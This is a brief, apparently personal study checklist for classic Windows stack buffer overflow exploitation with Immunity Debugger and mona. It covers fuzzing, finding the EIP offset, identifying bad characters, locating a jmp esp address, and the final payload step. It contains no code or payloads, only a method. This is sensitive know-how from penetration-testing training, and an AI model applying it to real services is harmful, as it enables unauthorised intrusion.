Buffer Overflow
Last updated
Last updated
Run Immunity Debugger
Open exe file or attach the service
Set mona configuration for the working directory
Press play button
Try to connect with the server
Immunity Debugger would tell you the port which service are listening.
Fuzzing until crash and check byte number of crash.
Generate the pattern with some script program and send it like sending fuzzer. ( length of pattern --> <number of crash + 200>
Check offset with mona or other tool.
or using the website with just input the EIP address.
[Optional] check EIP with BBBB
Set bytearray mona (make sure you have been set working directory)
Create badchar "\x00" with python script
Send badchar and compare it with mona on the ESP Address
How to note badchar:
00 is always badchar
The second char is badchar
The third char is affected by the second char, so not a badchar
The fourth char is badchar
The fifth char is affected by fourth char so not a badchar
and so on
Test bad char, if mona Memory comparison result shows "unmodified" then your badchars are correct.
Search module for jmp esp, because you just could control EIP and put payload on ESP, you you need to control EIP and put command "jmp esp", it mean always jumping the running code to ESP (your payload)
Get the module address of jmp esp, and write it reverse
Generate payload
